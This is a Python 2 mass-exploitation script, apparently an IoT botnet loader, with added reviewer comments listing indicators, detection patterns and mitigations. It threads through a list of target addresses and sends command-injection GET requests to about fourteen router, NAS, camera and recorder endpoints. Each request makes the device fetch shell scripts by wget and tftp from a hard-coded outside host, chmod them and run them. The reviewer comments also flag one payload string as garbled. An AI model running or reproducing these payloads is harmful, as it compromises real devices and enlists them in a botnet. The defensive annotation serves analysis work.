- import threading, sys, os, re, time, socket, requests, commands, urllib2
- from Queue import *
- from sys import stdout
- # Reviewer note: Python 2 syntax (print statement); this paste has lost all indentation.
- # With fewer than two command-line arguments, print usage and exit.
- if len(sys.argv) < 3:
- print "Usage: python "+sys.argv[0]+" <list> <threads>"
- sys.exit()
- # argv[1] names a file of target addresses (each line becomes one queue item);
- # argv[2] is the number of worker threads started at the bottom of the script.
- ips = open(sys.argv[1], "r").readlines()
- threads = int(sys.argv[2])
- queue = Queue()
- queue_count = 0
- # Scheme prefix: every request this script builds is plain HTTP.
- before = "http://" #http://
- # Hard-coded staging host and script names. Every request built in brute.run()
- # embeds a command sequence that fetches these files from this host (wget over
- # HTTP, tftp) into /tmp and executes them. For defenders these are the sample's
- # indicators: outbound HTTP/TFTP from a device to this address, and files with
- # these names under /tmp.
- tftpaddr = "95.215.60.17"
- wgetaddr = "95.215.60.17"
- wgetbin = "wgetbin.sh"
- tftp1bin = "tftp1bin.sh"
- tftp2bin = "tftp2bin.sh"
- # Put every line of the list on the work queue, printing a running count.
- for ip in ips:
- queue_count += 1
- stdout.write("\r[%d] Added to queue" % queue_count)
- stdout.flush()
- queue.put(ip)
- print "\n"
- # Worker loop run by each thread started at the bottom of the script: take one
- # address off the shared queue, start a `brute` thread for it, mark the queue
- # item done, then sleep 0.2 s before taking the next address.
- def w():
- try:
- while True:
- try:
- IP = queue.get()
- st4rt = brute(IP)
- st4rt.start()
- queue.task_done()
- time.sleep(0.2)
- # Bare except: any error in the loop body is reported with one generic
- # message and the loop continues.
- except:
- print "[*] THREAD UNABLE TO START" #may spam if finished
- pass
- # Outer bare except: anything escaping the loop ends the worker silently.
- except:
- pass
- #adminvehkoja22120024
- #0000f00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
- #9 spaces
- # One thread per target address. run() sends a fixed series of HTTP GET requests
- # to that address, 0.5 s apart. Each request places the same shell command
- # sequence into the query string of a different device web endpoint; the
- # trailing comment on each line names the product the author associates with it.
- # The command sequence is: cd /tmp, fetch one script with wget and two with tftp
- # from the hard-coded staging host, chmod 777 each, and execute each with a
- # per-endpoint tag as its argument. Responses are never read.
- #
- # Detection: in web-server, proxy or IDS logs these show up as GET requests whose
- # query string carries shell metacharacters together with strings such as
- # "cd /tmp", "wget http://", "tftp" and "chmod 777" (possibly percent-encoded on
- # the wire). On a device, look for the three script names under /tmp and for
- # outbound HTTP/TFTP to the staging host.
- # Mitigation: keep device management web interfaces unreachable from untrusted
- # networks and apply the vendors' firmware updates.
- class brute(threading.Thread):
- # Stores the target address with its trailing newline stripped.
- def __init__ (self, ip):
- threading.Thread.__init__(self)
- self.ip = str(ip).rstrip('\n')
- def run(self):
- try:
- # The commented-out urllib2 calls below were a per-endpoint pre-check; with
- # them disabled, every request is sent to every target regardless of what
- # device answers.
- #ret1 = urllib2.urlopen(before + self.ip + "/shell")
- #ret2 = urllib2.urlopen(before + self.ip + "/upgrade_handle.php")
- #ret3 = urllib2.urlopen(before + self.ip + "/setup.cgi")
- #ret4 = urllib2.urlopen(before + self.ip + "/cgi-bin/supervisor/PwdGrp.cgi")
- #ret5 = urllib2.urlopen(before + self.ip + "/cgi-bin/supervisor/CloudSetup.cgi")
- #ret6 = urllib2.urlopen(before + self.ip + "/cgi-bin/nobody/Search.cgi")
- #ret7 = urllib2.urlopen(before + self.ip + "/board.cgi")
- #ret8 = urllib2.urlopen(before + self.ip + "/app_license.shtml")
- #ret9 = urllib2.urlopen(before + self.ip + "/admin/confnetworking.html")
- #ret10 = urllib2.urlopen(before + self.ip + "/cgi-bin/webcm")
- #ret11 = urllib2.urlopen(before + self.ip + "/backupmgt/getAlias.php")
- #ret12 = urllib2.urlopen(before + self.ip + "/patch/books.cgi")
- #if ret1.code == 200:
- # print "JAWS Found: " + self.ip
- requests.get(before + self.ip + "/shell?" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " jaws; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " jaws; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " jaws;") # JAWS Web Server
- time.sleep(0.5)
- #if ret2.code == 200:
- # print "NetGear ReadyNAS Found: " + self.ip
- requests.get(before + self.ip + "/upgrade_handle.php?cmd=writeuploaddir&uploaddir=';" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " readynas; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " readynas; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " readynas;" + ";'") # Netgear ReadyNAS # works
- time.sleep(0.5)
- requests.get(before + self.ip + "/handle_daylightsaving.php?act=update&NTPServer=bla; " + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " readynas2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " readynas2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " readynas2;") # ReadyNAS Surveillance
- time.sleep(0.5)
- #if ret3.code == 200:
- # print "NetGear DGN1000 Found: " + self.ip
- # NOTE(review): the tail of the next string appears garbled by the paste; do not
- # use it verbatim as a signature.
- requests.get(before + self.ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " dgn1000; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " dgn1000; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " dgn1000;" + "&curpath=/¤tsetting.htm=1") # NetGear DGN1000 #Works!
- time.sleep(0.5)
- #if ret4.code == 200:
- # print "AVTECH 1 Found: " + self.ip
- requests.get(before + self.ip + "/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech1; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech1; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech1;" + ";&grp=SUPERVISOR&lifetime=5%20MIN") # AVTECH Test 1
- time.sleep(0.5)
- #if ret5.code == 200:
- # print "AVTECH 2 Found: " + self.ip
- requests.get(before + self.ip + "/cgi-bin/supervisor/CloudSetup.cgi?exefile=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech2;") # AVTECH Test 2
- time.sleep(0.5)
- #if ret6.code == 200:
- # print "AVTECH 3 Found: " + self.ip
- requests.get(before + self.ip + "/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech3; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech3; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech3;" + ";);&password=admin") #AVTECH Test 3
- time.sleep(0.5)
- #if ret7.code == 200:
- # print "Vacron NVR Found: " + self.ip
- requests.get(before + self.ip + "/board.cgi?cmd=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " vacron; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " vacron; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " vacron;") # Vacron NVR Video recorder # not sure
- time.sleep(0.5)
- #if ret8.code == 200:
- # print "AXIS Found: " + self.ip
- requests.get(before + self.ip + "/app_license.shtml?app=ORWELLLABS;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " axis; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " axis; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " axis;") # AXIS
- time.sleep(0.5)
- #if ret9.code == 200:
- # print "PineApp Found: " + self.ip
- requests.get(before + self.ip + "/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.com;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " pineapp; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " pineapp; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " pineapp;") # PineApp MailSecure
- time.sleep(0.5)
- #if ret10.code == 200:
- # print "Fritz!Box Found: " + self.ip
- requests.get(before + self.ip + "/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=& ;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " fritzbox; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " fritzbox; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " fritzbox;" + "; &") # Fritz!Box
- time.sleep(0.5)
- #if ret11.code == 200:
- # print "Seagate BlackArmor NAS Found: " + self.ip
- requests.get(before + self.ip + "/backupmgt/getAlias.php?ip=" + self.ip + " /etc/passwd; " + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " sgnas; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " sgnas; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " sgnas;") # Seagate BlackArmor NAS sg2000-2000.1331
- time.sleep(0.5)
- #if ret12.code == 200:
- # print "Web Terra Found: " + self.ip
- requests.get(before + self.ip + "/patch/books.cgi?file=|;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " webterra; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " webterra; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " webterra;" + ";|") # Web Terra 1.1 # Works
- time.sleep(0.5)
- requests.get(before + self.ip + "/cgi-bin/cgi_main?cmd=transfer_license&method=offline&sn=';" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " nvrmini2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " nvrmini2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " nvrmini2;" + ";#") # NVRmini2
- time.sleep(0.5)
- requests.get(before + self.ip + "/__debugging_center_utils___.php?log=something;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " nvrsolo; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " nvrsolo; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " nvrsolo;") # NVRsolo
- # Bare except: any error raised above ends run() silently.
- except:
- pass
- # Start `threads` worker threads, each running w(), 10 ms apart. A failure to
- # start a worker is reported with a generic message and otherwise ignored.
- for l in xrange(threads):
- try:
- t = threading.Thread(target=w)
- t.start()
- time.sleep(0.01)
- except:
- print "[-] FAILED TO START WORKER THREAD"
- pass